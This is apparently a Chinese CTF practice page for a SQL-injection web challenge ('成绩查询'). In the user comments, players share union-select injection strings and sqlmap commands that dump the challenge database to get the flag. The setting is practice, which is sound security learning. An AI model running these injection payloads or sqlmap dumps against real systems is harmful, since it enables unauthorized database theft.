成绩查询WEB 未解决

分数: 25 金币: 2
题目作者: 未知
一  血: npfs
一血奖励: 1金币
解  决: 11823
提  示:
描  述:
来源山科大ctf
评论
叶澜 1月前

sqlmap -u "http://171.80.2.169:11993/" --forms -D skctf --dump

回复 0

lovehhh 3月前

1' and 1=2 union select group_concat(skctf_flag),2,3,4 from fl4g;#--

回复 4

000000k 3月前

sqlmap 秒了

回复 0

道法自然 4月前

直接用sqlmap一把梭

回复 0

chm 4月前

爆库、爆表、爆字段、拿 flag

回复 0

chm 4月前

flag{**********}

回复 0

wywitkey 4月前

sqlmap一把梭,payload:sqlmap -u http://171.80.2.169:13533/index.php --form --batch -D skctf -T fl4g --columns --dump;就是等的时间长点....

回复 0
78 3月前

@wywitkey 说跟没说没区别

回复 1

wywitkey 4月前

@2647941092 各有各的好吧,因为是时间盲注才慢的,用sqlmap我在命令跑起来后去干别的,切回来时flag就出来了,当然了我也感觉手搓更爽

回复 0

2647941092 4月前

还不如手戳

回复 0

玲珑塔小1精 4月前

联合注入 ?id=-1' union select 1,2,3,4--

回复 0

奔跑的开开 5月前

sqlmap

回复 0

我要摆烂 5月前

-1' union select 1,2,3,fl4g from skctf_flag #

回复 1

WriteUp

image
harry

2 金币

评分(24)

解题动态

L! 攻破了该题 5小时前
box 攻破了该题 8小时前
911 攻破了该题 18小时前
LHM 攻破了该题 19小时前
yue 攻破了该题 19小时前
HZ 攻破了该题 19小时前
wyc 攻破了该题 19小时前
小蓝01 攻破了该题 19小时前
wh 攻破了该题 19小时前
diffni 攻破了该题 19小时前
dianci 攻破了该题 19小时前
cww 攻破了该题 19小时前
qyy 攻破了该题 19小时前
ghj 攻破了该题 19小时前
_T_ 攻破了该题 19小时前
lkgjlkglkw 攻破了该题 20小时前
popppyy 攻破了该题 20小时前
hyxi 攻破了该题 20小时前
Pisces_11z 攻破了该题 20小时前
jay cat 攻破了该题 20小时前
问题反馈